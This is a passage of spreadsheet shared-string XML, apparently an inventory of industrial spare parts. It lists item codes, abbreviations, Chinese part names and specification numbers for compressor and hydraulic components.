    <t>T25-31-05</t>
  </si>
  <si>
    <t>080509027</t>
  </si>
  <si>
    <t>OXQT25-31-06</t>
  </si>
  <si>
    <t>T25-31-06</t>
  </si>
  <si>
    <t>080509028</t>
  </si>
  <si>
    <t>MFHSY-190-94-T0-90</t>
  </si>
  <si>
    <t>低压密封圈</t>
  </si>
  <si>
    <t>080509029</t>
  </si>
  <si>
    <t>LTHSY191-94</t>
  </si>
  <si>
    <t>拉弹簧</t>
  </si>
  <si>
    <t>SY191-94（m6）</t>
  </si>
  <si>
    <t>080509030</t>
  </si>
  <si>
    <t>JLHT25-31-09</t>
  </si>
  <si>
    <t>T25-31-09</t>
  </si>
  <si>
    <t>080509031</t>
  </si>
  <si>
    <t>OXQ335/355*8.6</t>
  </si>
  <si>
    <t>335/355*8.6</t>
  </si>
  <si>
    <t>080509036</t>
  </si>
  <si>
    <t>THH223-46-08</t>
  </si>
  <si>
    <t>H223-46-08</t>
  </si>
  <si>
    <t>080509038</t>
  </si>
  <si>
    <t>OXQ220*8.6</t>
  </si>
  <si>
    <t>220*8.6</t>
  </si>
  <si>
    <t>080509040</t>
  </si>
  <si>
    <t>DQ39*48*2</t>
  </si>
  <si>
    <t>39*48*2</t>
  </si>
  <si>
    <t>080509041</t>
  </si>
  <si>
    <t>DQ27*32*2</t>
  </si>
  <si>
    <t>27*32*2</t>
  </si>
  <si>
    <t>080509043</t>
  </si>
  <si>
    <t>HSH6M25-21-01 Φ1100</t>
  </si>
  <si>
    <t>6M25-21-01 Φ1100</t>
  </si>
  <si>
    <t>080509044</t>
  </si>
  <si>
    <t>HSH500*14.5*10</t>
  </si>
  <si>
    <t>500*14.5*10</t>
  </si>
  <si>
    <t>080509045</t>
  </si>
  <si>
    <t>HSH670*220*12</t>
  </si>
  <si>
    <t>670*220*12</t>
  </si>
  <si>
    <t>080509046</t>
  </si>
  <si>
    <t>HSH290*97*7</t>
  </si>
  <si>
    <t>290*97*7</t>
  </si>
  <si>
    <t>080509047</t>
  </si>
  <si>
    <t>HSH6m25-26-02/V25-01</t>
  </si>
  <si>
    <t>6m25-26-02/V25-01</t>
  </si>
  <si>
    <t>080509048</t>
  </si>
  <si>
    <t>HSH6M25C-07-02</t>
  </si>
  <si>
    <t>6M25C-07-02</t>
  </si>
  <si>
    <t>080509049</t>
  </si>
  <si>
    <t>080509050</t>
  </si>
  <si>
    <t>OXQ105*5.7</t>
  </si>
  <si>
    <t>填料盒用</t>
  </si>
  <si>
    <t>080509051</t>
  </si>
  <si>
    <t>DQ150*140</t>
  </si>
  <si>
    <t>150*140</t>
  </si>
  <si>
    <t>080509052</t>
  </si>
  <si>
    <t>DQ105*95</t>
  </si>
  <si>
    <t>105*95</t>
  </si>
  <si>
    <t>080509056</t>
  </si>
  <si>
    <t>T25-31/32/33</t>
  </si>
  <si>
    <t>080509057</t>
  </si>
  <si>
    <t>LGWT22-03-02</t>
  </si>
  <si>
    <t>T22-03-02</t>
  </si>
  <si>
    <t>080509058</t>
  </si>
  <si>
    <t>TLZJT25-31/32/33</t>
  </si>
  <si>
    <t>080509059</t>
  </si>
  <si>
    <t>SZTXT22-04B-10</t>
  </si>
  <si>
    <t>T22-04B-10</t>
  </si>
  <si>
    <t>080509060</t>
  </si>
  <si>
    <t>YLTBJT22-04B-01</t>
  </si>
  <si>
    <t>压力体部件</t>
  </si>
  <si>
    <t>T22-04B-01</t>
  </si>
  <si>
    <t>080509061</t>
  </si>
  <si>
    <t>YLTBJT22-04B-03</t>
  </si>
  <si>
    <t>T22-04B-03</t>
  </si>
  <si>
    <t>080509062</t>
  </si>
  <si>
    <t>BC4D45-07-27</t>
  </si>
  <si>
    <t>4D45-07-27</t>
  </si>
  <si>
    <t>080509064</t>
  </si>
  <si>
    <t>TXSG4D45-07-26</t>
  </si>
  <si>
    <t>梯形丝杆</t>
  </si>
  <si>
    <t>4D45-07-26</t>
  </si>
  <si>
    <t>080509065</t>
  </si>
  <si>
    <t>XZT22-07B-22</t>
  </si>
  <si>
    <t>芯轴</t>
  </si>
  <si>
    <t>T22-07B-22</t>
  </si>
  <si>
    <t>080509070</t>
  </si>
  <si>
    <t>J8*C/28*40</t>
  </si>
  <si>
    <t>8*C/28*40</t>
  </si>
  <si>
    <t>080509071</t>
  </si>
  <si>
    <t>XA10*18</t>
  </si>
  <si>
    <t>A6*30</t>
  </si>
  <si>
    <t>080509077</t>
  </si>
  <si>
    <t>YGT25-31-01</t>
  </si>
  <si>
    <t>T25-31-01</t>
  </si>
  <si>
    <t>080509079</t>
  </si>
  <si>
    <t>SLMT22-04B-02</t>
  </si>
  <si>
    <t>上螺母</t>
  </si>
  <si>
    <t>T22-04B-02</t>
  </si>
  <si>
    <t>080509083</t>
  </si>
  <si>
    <t>FG6M25-11-02</t>
  </si>
  <si>
    <t>6M25-11-02</t>
  </si>
  <si>
    <t>080509084</t>
  </si>
  <si>
    <t>FG6M25-12-04</t>
  </si>
  <si>
    <t>6M25-12-04</t>
  </si>
  <si>
    <t>080509089</t>
  </si>
  <si>
    <t>YT6M25-13-05</t>
  </si>
  <si>
    <t>6M25-13-05</t>
  </si>
  <si>
    <t>080509091</t>
  </si>
  <si>
    <t>YT6m25-14-04</t>
  </si>
  <si>
    <t>6m25-14-04</t>
  </si>
  <si>
    <t>080509092</t>
  </si>
  <si>
    <t>4D45-07B-06</t>
  </si>
  <si>
    <t>080509093</t>
  </si>
  <si>
    <t>XZT22-07B-21</t>
  </si>
  <si>
    <t>T22-07B-21</t>
  </si>
  <si>
    <t>080509094</t>
  </si>
  <si>
    <t>WLLYT22-07b-02</t>
  </si>
  <si>
    <t>涡轮轮缘</t>
  </si>
  <si>
    <t>T22-07b-02</t>
  </si>
  <si>
    <t>080509097</t>
  </si>
  <si>
    <t>TZDS32/S34</t>
  </si>
  <si>
    <t>S32/S34</t>
  </si>
  <si>
    <t>080510006</t>
  </si>
  <si>
    <t>LGMT22-03-05</t>
  </si>
  <si>
    <t>连杆母</t>
  </si>
  <si>
    <t>T22-03-05</t>
  </si>
  <si>
    <t>080510008</t>
  </si>
  <si>
    <t>XDQΦ10（GB856）</t>
  </si>
  <si>
    <t>小垫圈</t>
  </si>
  <si>
    <t>Φ10（GB856）</t>
  </si>
  <si>
    <t>080510011</t>
  </si>
  <si>
    <t>LSSY5-92(M39*2)</t>
  </si>
  <si>
    <t>SY5-92(M39*2)</t>
  </si>
  <si>
    <t>080510015</t>
  </si>
  <si>
    <t>TLZCTS-1.5/400-24/12</t>
  </si>
  <si>
    <t>CTS-1.5/400-24/12</t>
  </si>
  <si>
    <t>080510019</t>
  </si>
  <si>
    <t>YT6M25-17-11</t>
  </si>
  <si>
    <t>6M25-17-11</t>
  </si>
  <si>
    <t>080510020</t>
  </si>
  <si>
    <t>YT6M25-17-02</t>
  </si>
  <si>
    <t>6M25-17-02</t>
  </si>
  <si>
    <t>080510021</t>
  </si>
  <si>
    <t>YT6M25-16-02</t>
  </si>
  <si>
    <t>6M25-16-02</t>
  </si>
  <si>
    <t>080510022</t>
  </si>
  <si>
    <t>YT6M25-16-07</t>
  </si>
  <si>
    <t>6M25-16-07</t>
  </si>
  <si>
    <t>080510023</t>
  </si>
  <si>
    <t>ZCH6M25</t>
  </si>
  <si>
    <t>080510026</t>
  </si>
  <si>
    <t>DWGT22-33-03</t>
  </si>
  <si>
    <t>T22-33-03</t>
  </si>
  <si>
    <t>080510028</t>
  </si>
  <si>
    <t>支承座</t>
  </si>
  <si>
    <t>080510031</t>
  </si>
  <si>
    <t>TDQB20</t>
  </si>
  <si>
    <t>铁垫圈</t>
  </si>
  <si>
    <t>B20</t>
  </si>
  <si>
    <t>080510032</t>
  </si>
  <si>
    <t>FG6M25-12-07</t>
  </si>
  <si>
    <t>6M25-12-07</t>
  </si>
  <si>
    <t>080510033</t>
  </si>
  <si>
    <t>FG6M25-16-14</t>
  </si>
  <si>
    <t>6M25-16-14</t>
  </si>
  <si>
    <t>080510034</t>
  </si>
  <si>
    <t>ZYQGS1.5-1400-16</t>
  </si>
  <si>
    <t>注油器</t>
  </si>
  <si>
    <t>GS1.5-1400-16</t>
  </si>
  <si>
    <t>080510035</t>
  </si>
  <si>
    <t>ZCS</t>
  </si>
  <si>
    <t>080510036</t>
  </si>
  <si>
    <t>080510038</t>
  </si>
  <si>
    <t>CT4D45-07-37</t>
  </si>
  <si>
    <t>4D45-07-37</t>
  </si>
  <si>
    <t>080510039</t>
  </si>
  <si>
    <t>GYQ6M25-06-00</t>
  </si>
  <si>
    <t>6M25-06-00</t>
  </si>
  <si>
    <t>080510040</t>
  </si>
  <si>
    <t>HJZT22-07B-13</t>
  </si>
  <si>
    <t>T22-07B-13</t>
  </si>
  <si>
    <t>080510042</t>
  </si>
  <si>
    <t>WJGTS6M25(U)I15-01</t>
  </si>
  <si>
    <t>五级缸套</t>
  </si>
  <si>
    <t>S6M25(U)I15-01</t>
  </si>
  <si>
    <t>080510044</t>
  </si>
  <si>
    <t>GG6M25-12-01</t>
  </si>
  <si>
    <t>缸盖</t>
  </si>
  <si>
    <t>6M25-12-01</t>
  </si>
  <si>
    <t>080510045</t>
  </si>
  <si>
    <t>活塞.活塞杆组件</t>
  </si>
  <si>
    <t>6M25-26-01/6M2525-02</t>
  </si>
  <si>
    <t>080611004</t>
  </si>
  <si>
    <t>ZCH07-02F</t>
  </si>
  <si>
    <t>07-02F</t>
  </si>
  <si>
    <t>080611006</t>
  </si>
  <si>
    <t>HSG07-05F</t>
  </si>
  <si>
    <t>07-05F</t>
  </si>
  <si>
    <t>080611008</t>
  </si>
  <si>
    <t>LDM8/M10*35</t>
  </si>
  <si>
    <t>M4/M8/M10</t>
  </si>
  <si>
    <t>080611009</t>
  </si>
  <si>
    <t>LMM8 M10</t>
  </si>
  <si>
    <t>M8 M10</t>
  </si>
  <si>
    <t>080611010</t>
  </si>
  <si>
    <t>TT04-02</t>
  </si>
  <si>
    <t>04-02</t>
  </si>
  <si>
    <t>080611013</t>
  </si>
  <si>
    <t>LJQ04-03F</t>
  </si>
  <si>
    <t>连接器</t>
  </si>
  <si>
    <t>04-03F</t>
  </si>
  <si>
    <t>080611014</t>
  </si>
  <si>
    <t>ZFSZTX04-07F/13F</t>
  </si>
  <si>
    <t>主副十字头肖</t>
  </si>
  <si>
    <t>04-07F/13F</t>
  </si>
  <si>
    <t>080611017</t>
  </si>
  <si>
    <t>FL04-06F</t>
  </si>
  <si>
    <t>04-06F</t>
  </si>
  <si>
    <t>080611018</t>
  </si>
  <si>
    <t>TH12-19-20-00</t>
  </si>
  <si>
    <t>12-19-20-00</t>
  </si>
  <si>
    <t>080611019</t>
  </si>
  <si>
    <t>07-01F</t>
  </si>
  <si>
    <t>080611020</t>
  </si>
  <si>
    <t>XZCH08-02F</t>
  </si>
  <si>
    <t>小支承环</t>
  </si>
  <si>
    <t>08-02F</t>
  </si>
  <si>
    <t>080611022</t>
  </si>
  <si>
    <t>TGLH08-04F</t>
  </si>
  <si>
    <t>08-04F</t>
  </si>
  <si>
    <t>080611023</t>
  </si>
  <si>
    <t>08-05F</t>
  </si>
  <si>
    <t>080611024</t>
  </si>
  <si>
    <t>XJLH08-06F</t>
  </si>
  <si>
    <t>小节流环</t>
  </si>
  <si>
    <t>08-06F</t>
  </si>
  <si>
    <t>080611026</t>
  </si>
  <si>
    <t>TH08-08</t>
  </si>
  <si>
    <t>08-08</t>
  </si>
  <si>
    <t>080611027</t>
  </si>
  <si>
    <t>TP08-10</t>
  </si>
  <si>
    <t>08-10</t>
  </si>
  <si>
    <t>080611028</t>
  </si>
  <si>
    <t>TL08-13-15F</t>
  </si>
  <si>
    <t>填料（密封圈）</t>
  </si>
  <si>
    <t>08-13-15F</t>
  </si>
  <si>
    <t>080611030</t>
  </si>
  <si>
    <t>LH08-14T</t>
  </si>
  <si>
    <t>拉簧</t>
  </si>
  <si>
    <t>08-14T</t>
  </si>
  <si>
    <t>080611033</t>
  </si>
  <si>
    <t>XZ3*22</t>
  </si>
  <si>
    <t>8*12</t>
  </si>
  <si>
    <t>080611036</t>
  </si>
  <si>
    <t>LM14-06</t>
  </si>
  <si>
    <t>14-06</t>
  </si>
  <si>
    <t>080611043</t>
  </si>
  <si>
    <t>DZW-03-01F</t>
  </si>
  <si>
    <t>080611044</t>
  </si>
  <si>
    <t>DZW-03-03F</t>
  </si>
  <si>
    <t>080611045</t>
  </si>
  <si>
    <t>LGLS</t>
  </si>
  <si>
    <t>DZW-03-04F</t>
  </si>
  <si>
    <t>080611046</t>
  </si>
  <si>
    <t>DZW-03-08F</t>
  </si>
  <si>
    <t>080611047</t>
  </si>
  <si>
    <t>LJZ</t>
  </si>
  <si>
    <t>连接轴</t>
  </si>
  <si>
    <t>DZW-04-09-00F</t>
  </si>
  <si>
    <t>080611048</t>
  </si>
  <si>
    <t>YBZJ</t>
  </si>
  <si>
    <t>油泵组件</t>
  </si>
  <si>
    <t>DZW-09-00F</t>
  </si>
  <si>
    <t>080611052</t>
  </si>
  <si>
    <t>DZW-05-19G</t>
  </si>
  <si>
    <t>080612003</t>
  </si>
  <si>
    <t>08-03</t>
  </si>
  <si>
    <t>080612004</t>
  </si>
  <si>
    <t>DZW-08-05/26G</t>
  </si>
  <si>
    <t>080612005</t>
  </si>
  <si>
    <t>TZD02-03</t>
  </si>
  <si>
    <t>080612006</t>
  </si>
  <si>
    <t>TZD</t>
  </si>
  <si>
    <t>调整垫（薄）</t>
  </si>
  <si>
    <t>DZW-08-07</t>
  </si>
  <si>
    <t>080612011</t>
  </si>
  <si>
    <t>ZLH08-03</t>
  </si>
  <si>
    <t>080612012</t>
  </si>
  <si>
    <t>GLH08-04</t>
  </si>
  <si>
    <t>08-04</t>
  </si>
  <si>
    <t>080612013</t>
  </si>
  <si>
    <t>JLH08-06</t>
  </si>
  <si>
    <t>08-06</t>
  </si>
  <si>
    <t>080612021</t>
  </si>
  <si>
    <t>DZW-08-10</t>
  </si>
  <si>
    <t>080612022</t>
  </si>
  <si>
    <t>GQ08-11</t>
  </si>
  <si>
    <t>箍圏</t>
  </si>
  <si>
    <t>08-11</t>
  </si>
  <si>
    <t>080612023</t>
  </si>
  <si>
    <t>LTH08-04</t>
  </si>
  <si>
    <t>080612024</t>
  </si>
  <si>
    <t>ZLH08-16</t>
  </si>
  <si>
    <t>08-16</t>
  </si>
  <si>
    <t>080612027</t>
  </si>
  <si>
    <t>TH（BFY）</t>
  </si>
  <si>
    <t>弹簧（白阀用）</t>
  </si>
  <si>
    <t>080612032</t>
  </si>
  <si>
    <t>SZTX04-07</t>
  </si>
  <si>
    <t>04-07</t>
  </si>
  <si>
    <t>080612038</t>
  </si>
  <si>
    <t>ZT09-13</t>
  </si>
  <si>
    <t>09-13</t>
  </si>
  <si>
    <t>080612042</t>
  </si>
  <si>
    <t>CL09-06</t>
  </si>
  <si>
    <t>09-06</t>
  </si>
  <si>
    <t>080612043</t>
  </si>
  <si>
    <t>TZD04-06</t>
  </si>
  <si>
    <t>080612046</t>
  </si>
  <si>
    <t>M07-01</t>
  </si>
  <si>
    <t>07-01</t>
  </si>
  <si>
    <t>080612047</t>
  </si>
  <si>
    <t>ZXFBG5T 18W-40</t>
  </si>
  <si>
    <t>BG5T 18W-40</t>
  </si>
  <si>
    <t>080612049</t>
  </si>
  <si>
    <t>DM04-01</t>
  </si>
  <si>
    <t>大母</t>
  </si>
  <si>
    <t>080612050</t>
  </si>
  <si>
    <t>LZQ04-03</t>
  </si>
  <si>
    <t>04-03</t>
  </si>
  <si>
    <t>080612053</t>
  </si>
  <si>
    <t>GYH01-10</t>
  </si>
  <si>
    <t>01-10</t>
  </si>
  <si>
    <t>080612057</t>
  </si>
  <si>
    <t>M05-08</t>
  </si>
  <si>
    <t>帽</t>
  </si>
  <si>
    <t>05-08</t>
  </si>
  <si>
    <t>080612058</t>
  </si>
  <si>
    <t>LS05-09</t>
  </si>
  <si>
    <t>05-09</t>
  </si>
  <si>
    <t>080612059</t>
  </si>
  <si>
    <t>YG05-12</t>
  </si>
  <si>
    <t>05-12</t>
  </si>
  <si>
    <t>080612060</t>
  </si>
  <si>
    <t>GLQ</t>
  </si>
  <si>
    <t>精过滤器</t>
  </si>
  <si>
    <t>ZA-93-00</t>
  </si>
  <si>
    <t>080612062</t>
  </si>
  <si>
    <t>XZ09-04A</t>
  </si>
  <si>
    <t>09-04A</t>
  </si>
  <si>
    <t>080612063</t>
  </si>
  <si>
    <t>ZCH07-02</t>
  </si>
  <si>
    <t>07-02</t>
  </si>
  <si>
    <t>080612064</t>
  </si>
  <si>
    <t>LQQX94-01-00</t>
  </si>
  <si>
    <t>冷却器芯</t>
  </si>
  <si>
    <t>94-01-00</t>
  </si>
  <si>
    <t>080612065</t>
  </si>
  <si>
    <t>YHAR370-07</t>
  </si>
  <si>
    <t>AR370-07</t>
  </si>
  <si>
    <t>080612066</t>
  </si>
  <si>
    <t>YHAR370-29</t>
  </si>
  <si>
    <t>AR370-29</t>
  </si>
  <si>
    <t>080612073</t>
  </si>
  <si>
    <t>HS07-03</t>
  </si>
  <si>
    <t>07-03</t>
  </si>
  <si>
    <t>080612080</t>
  </si>
  <si>
    <t>DZW-03-02</t>
  </si>
  <si>
    <t>080612091</t>
  </si>
  <si>
    <t>GYQZCDZW-09-10/11-13</t>
  </si>
  <si>
    <t>刮油器总程</t>
  </si>
  <si>
    <t>DZW-09-10/11-13</t>
  </si>
  <si>
    <t>080612099</t>
  </si>
  <si>
    <t>TLHZJDZW-08-00</t>
  </si>
  <si>
    <t>填料盒组件</t>
  </si>
  <si>
    <t>DZW-08-00</t>
  </si>
  <si>
    <t>080613001</t>
  </si>
  <si>
    <t>DT01-26</t>
  </si>
  <si>
    <t>导套</t>
  </si>
  <si>
    <t>01-26</t>
  </si>
  <si>
    <t>080613003</t>
  </si>
  <si>
    <t>CT03-05</t>
  </si>
  <si>
    <t>03-05</t>
  </si>
  <si>
    <t>080613008</t>
  </si>
  <si>
    <t>ZCH08-03</t>
  </si>
  <si>
    <t>080613013</t>
  </si>
  <si>
    <t>JLH08-23</t>
  </si>
  <si>
    <t>08-23</t>
  </si>
  <si>
    <t>080613014</t>
  </si>
  <si>
    <t>JYF05-17/05-20</t>
  </si>
  <si>
    <t>进液阀</t>
  </si>
  <si>
    <t>05-17/05-20</t>
  </si>
  <si>
    <t>080613015</t>
  </si>
  <si>
    <t>TZD08-16DE</t>
  </si>
  <si>
    <t>08-16DE</t>
  </si>
  <si>
    <t>080613017</t>
  </si>
  <si>
    <t>YB09-00</t>
  </si>
  <si>
    <t>DZW09-00</t>
  </si>
  <si>
    <t>080613019</t>
  </si>
  <si>
    <t>JLH*08-04</t>
  </si>
  <si>
    <t>080613020</t>
  </si>
  <si>
    <t>TZD08-05</t>
  </si>
  <si>
    <t>08-05/06/07</t>
  </si>
  <si>
    <t>080613023</t>
  </si>
  <si>
    <t>YJH08-12</t>
  </si>
  <si>
    <t>08-12</t>
  </si>
  <si>
    <t>080613024</t>
  </si>
  <si>
    <t>ZLH08-15A</t>
  </si>
  <si>
    <t>08-15A</t>
  </si>
  <si>
    <t>080613027</t>
  </si>
  <si>
    <t>DWXGB119-76</t>
  </si>
  <si>
    <t>定位销</t>
  </si>
  <si>
    <t>GB119-76</t>
  </si>
  <si>
    <t>080613028</t>
  </si>
  <si>
    <t>TLH08-08-24</t>
  </si>
  <si>
    <t>08-08-24</t>
  </si>
  <si>
    <t>080613029</t>
  </si>
  <si>
    <t>DQΦ120</t>
  </si>
  <si>
    <t>Φ120</t>
  </si>
  <si>
    <t>080613030</t>
  </si>
  <si>
    <t>LJQ2DZ-04-10</t>
  </si>
  <si>
    <t>2DZ-04-10</t>
  </si>
  <si>
    <t>080613031</t>
  </si>
  <si>
    <t>ZFTX04-01-03</t>
  </si>
  <si>
    <t>主副头销</t>
  </si>
  <si>
    <t>04-01-03</t>
  </si>
  <si>
    <t>080613032</t>
  </si>
  <si>
    <t>ZFSZTT2DZ04-01-00</t>
  </si>
  <si>
    <t>主副十字头体</t>
  </si>
  <si>
    <t>2DZ04-01-00</t>
  </si>
  <si>
    <t>080613033</t>
  </si>
  <si>
    <t>M2DZ-04-08</t>
  </si>
  <si>
    <t>母</t>
  </si>
  <si>
    <t>2DZ-04-08</t>
  </si>
  <si>
    <t>080613034</t>
  </si>
  <si>
    <t>LG2DZ-03-00</t>
  </si>
  <si>
    <t>2DZ-03-00</t>
  </si>
  <si>
    <t>080613035</t>
  </si>
  <si>
    <t>GQ04-06</t>
  </si>
  <si>
    <t>080613036</t>
  </si>
  <si>
    <t>SKQ2DZ-04-05</t>
  </si>
  <si>
    <t>锁扣圏</t>
  </si>
  <si>
    <t>2DZ-04-05</t>
  </si>
  <si>
    <t>080613037</t>
  </si>
  <si>
    <t>GYH2DZ-01-22/23</t>
  </si>
  <si>
    <t>2DZ-01-22/23</t>
  </si>
  <si>
    <t>080613039</t>
  </si>
  <si>
    <t>LS04-02-01</t>
  </si>
  <si>
    <t>04-02-01</t>
  </si>
  <si>
    <t>080613040</t>
  </si>
  <si>
    <t>M2DZ-76</t>
  </si>
  <si>
    <t>2DZ-76</t>
  </si>
  <si>
    <t>080613041</t>
  </si>
  <si>
    <t>080613042</t>
  </si>
  <si>
    <t>J12*8/6*6</t>
  </si>
  <si>
    <t>12*8/6*6</t>
  </si>
  <si>
    <t>080613043</t>
  </si>
  <si>
    <t>08-19</t>
  </si>
  <si>
    <t>080613044</t>
  </si>
  <si>
    <t>08-26</t>
  </si>
  <si>
    <t>080613045</t>
  </si>
  <si>
    <t>2DZ-08-22</t>
  </si>
  <si>
    <t>080613046</t>
  </si>
  <si>
    <t>GT2DZ-05-07</t>
  </si>
  <si>
    <t>2DZ-05-07</t>
  </si>
  <si>
    <t>080714002</t>
  </si>
  <si>
    <t>MFH3W-6BT1-03-01A-8</t>
  </si>
  <si>
    <t>3W-6BT1-03-01A-8</t>
  </si>
  <si>
    <t>080714004</t>
  </si>
  <si>
    <t>YLM3-01A-7</t>
  </si>
  <si>
    <t>元螺母</t>
  </si>
  <si>
    <t>3-01A-7</t>
  </si>
  <si>
    <t>080714005</t>
  </si>
  <si>
    <t>JYF</t>
  </si>
  <si>
    <t>080714006</t>
  </si>
  <si>
    <t>LGLS3-01A-4</t>
  </si>
  <si>
    <t>3-01A-4</t>
  </si>
  <si>
    <t>080714007</t>
  </si>
  <si>
    <t>080714008</t>
  </si>
  <si>
    <t>SZTT3-01A-02</t>
  </si>
  <si>
    <t>3-01A-02</t>
  </si>
  <si>
    <t>080714009</t>
  </si>
  <si>
    <t>PYF</t>
  </si>
  <si>
    <t>排液阀</t>
  </si>
  <si>
    <t>080714014</t>
  </si>
  <si>
    <t>TJM3-01A-3</t>
  </si>
  <si>
    <t>调节母</t>
  </si>
  <si>
    <t>3-01A-3</t>
  </si>
  <si>
    <t>080714015</t>
  </si>
  <si>
    <t>TJM3-01A-9</t>
  </si>
  <si>
    <t>3-01A-9</t>
  </si>
  <si>
    <t>080714017</t>
  </si>
  <si>
    <t>ZCG3-01A-32</t>
  </si>
  <si>
    <t>轴承盖</t>
  </si>
  <si>
    <t>3-01A-32</t>
  </si>
  <si>
    <t>080714018</t>
  </si>
  <si>
    <t>HT3-01A-5</t>
  </si>
  <si>
    <t>函体</t>
  </si>
  <si>
    <t>3-01A-5</t>
  </si>
  <si>
    <t>080714019</t>
  </si>
  <si>
    <t>LG3W6BT2-01A-01-00</t>
  </si>
  <si>
    <t>3W6BT2-01A-01-00</t>
  </si>
  <si>
    <t>080714020</t>
  </si>
  <si>
    <t>ZSG3W6BT1-3-01</t>
  </si>
  <si>
    <t>3W6BT1-3-01</t>
  </si>
  <si>
    <t>080714022</t>
  </si>
  <si>
    <t>MFQ03-01A-12/13</t>
  </si>
  <si>
    <t>03-01A-12/13</t>
  </si>
  <si>
    <t>080714023</t>
  </si>
  <si>
    <t>3W-6B-1A-40/38</t>
  </si>
  <si>
    <t>080714025</t>
  </si>
  <si>
    <t>DYB6B-1A-15</t>
  </si>
  <si>
    <t>挡油板</t>
  </si>
  <si>
    <t>6B-1A-15</t>
  </si>
  <si>
    <t>080714026</t>
  </si>
  <si>
    <t>ZCG1A-20</t>
  </si>
  <si>
    <t>1A-20</t>
  </si>
  <si>
    <t>080714027</t>
  </si>
  <si>
    <t>DSQ1A-39</t>
  </si>
  <si>
    <t>1A-39</t>
  </si>
  <si>
    <t>080714041</t>
  </si>
  <si>
    <t>ZLSAR-112-1-9</t>
  </si>
  <si>
    <t>主螺栓</t>
  </si>
  <si>
    <t>AR-112-1-9</t>
  </si>
  <si>
    <t>080714043</t>
  </si>
  <si>
    <t>JDH1A-37</t>
  </si>
  <si>
    <t>间定环</t>
  </si>
  <si>
    <t>1A-37</t>
  </si>
  <si>
    <t>080815001</t>
  </si>
  <si>
    <t>SDF24so-B10H-W</t>
  </si>
  <si>
    <t>手动换向阀</t>
  </si>
  <si>
    <t>24so-B10H-W</t>
  </si>
  <si>
    <t>080815002</t>
  </si>
  <si>
    <t>JZF-B32H</t>
  </si>
  <si>
    <t>080815004</t>
  </si>
  <si>
    <t>CLB</t>
  </si>
  <si>
    <t>080815006</t>
  </si>
  <si>
    <t>JGZC</t>
  </si>
  <si>
    <t>胶管总成</t>
  </si>
  <si>
    <t>1000A</t>
  </si>
  <si>
    <t>080815009</t>
  </si>
  <si>
    <t>OXQ16/20/24</t>
  </si>
  <si>
    <t>16/20/24/35</t>
  </si>
  <si>
    <t>080815010</t>
  </si>
  <si>
    <t>clb</t>
  </si>
  <si>
    <t>CBHB80</t>
  </si>
  <si>
    <t>080815014</t>
  </si>
  <si>
    <t>qf</t>
  </si>
  <si>
    <t>液压专用球阀</t>
  </si>
  <si>
    <t>CJZQ-H32W</t>
  </si>
  <si>
    <t>080815015</t>
  </si>
  <si>
    <t>回油过滤器</t>
  </si>
  <si>
    <t>PFA-630*180F</t>
  </si>
  <si>
    <t>080815018</t>
  </si>
  <si>
    <t>CB-25</t>
  </si>
  <si>
    <t>080815019</t>
  </si>
  <si>
    <t>CBY-3080</t>
  </si>
  <si>
    <t>080815020</t>
  </si>
  <si>
    <t>CBY-3100</t>
  </si>
  <si>
    <t>080815022</t>
  </si>
  <si>
    <t>ZHD33/27/20</t>
  </si>
  <si>
    <t>组合垫</t>
  </si>
  <si>
    <t>33/27/20/18/45</t>
  </si>
  <si>
    <t>080815023</t>
  </si>
  <si>
    <t>KCB-55</t>
  </si>
  <si>
    <t>080815027</t>
  </si>
  <si>
    <t>油缸</t>
  </si>
  <si>
    <t>125/90</t>
  </si>
  <si>
    <t>080815030</t>
  </si>
  <si>
    <t>080815032</t>
  </si>
  <si>
    <t>YG63/45-300</t>
  </si>
  <si>
    <t>63/40-380</t>
  </si>
  <si>
    <t>080815044</t>
  </si>
  <si>
    <t>HXF</t>
  </si>
  <si>
    <t>换向阀</t>
  </si>
  <si>
    <t>080815047</t>
  </si>
  <si>
    <t>MFJ</t>
  </si>
  <si>
    <t>密封件</t>
  </si>
  <si>
    <t>Y63/Y80/50</t>
  </si>
  <si>
    <t>080815049</t>
  </si>
  <si>
    <t>油缸密封圈</t>
  </si>
  <si>
    <t>YXd55</t>
  </si>
  <si>
    <t>080815050</t>
  </si>
  <si>
    <t>JLFLF-B-10H</t>
  </si>
  <si>
    <t>LF-L32H</t>
  </si>
  <si>
    <t>080815051</t>
  </si>
  <si>
    <t>LF-L20H</t>
  </si>
  <si>
    <t>080815052</t>
  </si>
  <si>
    <t>固态继电器</t>
  </si>
  <si>
    <t>5A</t>
  </si>
  <si>
    <t>080815053</t>
  </si>
  <si>
    <t>DCT（XQ）</t>
  </si>
  <si>
    <t>电磁铁（线圈）</t>
  </si>
  <si>
    <t>080815054</t>
  </si>
  <si>
    <t>160*180</t>
  </si>
  <si>
    <t>080815063</t>
  </si>
  <si>
    <t>XNJDN*40/100A</t>
  </si>
  <si>
    <t>蓄能器胶袋</t>
  </si>
  <si>
    <t>NXQ-L40/100A</t>
  </si>
  <si>
    <t>080815069</t>
  </si>
  <si>
    <t>080815070</t>
  </si>
  <si>
    <t>YGDN700</t>
  </si>
  <si>
    <t>080815072</t>
  </si>
  <si>
    <t>BZJ</t>
  </si>
  <si>
    <t>泵支架</t>
  </si>
  <si>
    <t>CB-B25</t>
  </si>
  <si>
    <t>080815074</t>
  </si>
  <si>
    <t>ZJCB50</t>
  </si>
  <si>
    <t>CB80</t>
  </si>
  <si>
    <t>080815085</t>
  </si>
  <si>
    <t>JSP</t>
  </si>
  <si>
    <t>计数盘</t>
  </si>
  <si>
    <t>CJ/TJQ06-F-7</t>
  </si>
  <si>
    <t>080815086</t>
  </si>
  <si>
    <t>CJ/TJQ06-F-6</t>
  </si>
  <si>
    <t>080815088</t>
  </si>
  <si>
    <t>DCFFT</t>
  </si>
  <si>
    <t>电磁阀阀体</t>
  </si>
  <si>
    <t>080815092</t>
  </si>
  <si>
    <t>NLTCB50/11KW</t>
  </si>
  <si>
    <t>尼龙套</t>
  </si>
  <si>
    <t>CB50/11KW</t>
  </si>
  <si>
    <t>080815093</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>电液阀底板</t>
  </si>
  <si>
    <t>34D1YP-B20H-T</t>
  </si>
  <si>
    <t>080815094</t>
  </si>
  <si>
    <t>DDYF4WE20M-C220V-5A</t>
  </si>
  <si>
    <t>电液动换向阀</t>
  </si>
  <si>
    <t>4WE20M-G220V-5A</t>
  </si>
  <si>
    <t>080816001</t>
  </si>
  <si>
    <t>LPP31164A-5-6</t>
  </si>
  <si>
    <t>炉条</t>
  </si>
  <si>
    <t>31164A-5-6</t>
  </si>
  <si>
    <t>080816016</t>
  </si>
  <si>
    <t>CBFFB</t>
  </si>
  <si>
